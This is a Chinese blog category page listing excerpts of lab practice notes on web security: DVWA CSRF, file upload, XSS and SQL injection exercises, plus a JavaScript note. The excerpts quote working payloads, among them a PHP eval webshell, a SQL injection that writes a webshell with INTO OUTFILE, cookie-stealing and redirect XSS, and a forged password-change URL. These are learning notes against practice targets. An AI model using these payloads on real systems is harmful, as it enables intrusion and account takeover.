![](https://img-blog.csdnimg.cn/20190927151043371.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
web安全学习
文章平均质量分 72
简单的靶场练习记录
瓜皮鸭
这个作者很懒,什么都没留下…
展开
-
javascript笔记
javascript笔记输出数据没有打印或者输出的函数window.alert() //弹出警告框innerHTML //写入到HTML元素document.write() //将内容写到HTML文档中.console.log() //写入到浏览器的控制台实例:1<p id ="hello">原段落</p><script>document.getElementById("hello").innerHTML="已经修改段落"</script&原创 2021-03-07 10:35:38 · 101 阅读 · 0 评论 -
dvwa之csrf
dvwa之csrflow1. 在新的页面中打开以下url,发现成功修改密码http://192.168.43.116/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#需要注意的是,CSRF最关键的是利用受害者的cookie向服务器发送伪造请求,所以如果受害者之前用Chrome浏览器登录的这个系统,而用搜狗浏览器点击这个链接,攻击是不会触发的,因为搜狗浏览器并不原创 2021-03-07 10:38:35 · 176 阅读 · 0 评论 -
文件上传
文件上传low一句话木马:<?php @eval($_POST['up']);?>菜刀连接的是上传的文件的目录,不是url!http://192.168.43.116/dvwa/hackable/uploads/hack.php源码 <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";原创 2021-03-07 10:34:43 · 259 阅读 · 0 评论 -
XSS挑战之旅
第一关无任何限制第二关<h1 align=center>欢迎来到level2</h1><h2 align=center>没有找到和<script>alert(1)</script>相关的结果.</h2><center><form action=level2.php method=GET><input name=keyword value="<..原创 2021-03-07 10:41:15 · 221 阅读 · 0 评论 -
dvwa之xss
dvwaxssreflectedlow #src地址错误,然后执行onerror的内容<img src=http://192.168.10.128/a.jpg οnerrοr=alert('xss4')> <body οnlοad=alert('xss2')>重定向语句<script>window.location='http://www.163.com'</script>获取cookie<script>alert原创 2021-03-07 10:43:59 · 172 阅读 · 0 评论 -
sql注入dvwa
SQL injection%28 (%29 )%2c ,%23 # 写一句话木马?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 关于mysql注释的用法 (dvwa是mysql,post方式)low1' or '1' ='1原创 2021-03-07 10:39:52 · 3696 阅读 · 0 评论 -
sql注入(1)
sql注入分类数字型注入$id =$_GET['id'];$sql= "SELECT * FROM users WHERE id = $id LIMIT 0,1";$result = mysql_query($sql);$row = mysql_fetch($result);字符型注入$id =$_GET['id'];$sql= "SELECT * FROM users WHERE id = '$id' LIMIT 0,1";$result = mysql_query($sql);原创 2021-03-06 20:01:28 · 266 阅读 · 0 评论 -
墨者靶场(三)sql字符注入
手工注入时,一直报错,评论中说在–后加+上网查到了原因:https://blog.csdn.net/weixin_43096078/article/details/108215076记录一下原创 2020-09-24 18:28:30 · 101 阅读 · 0 评论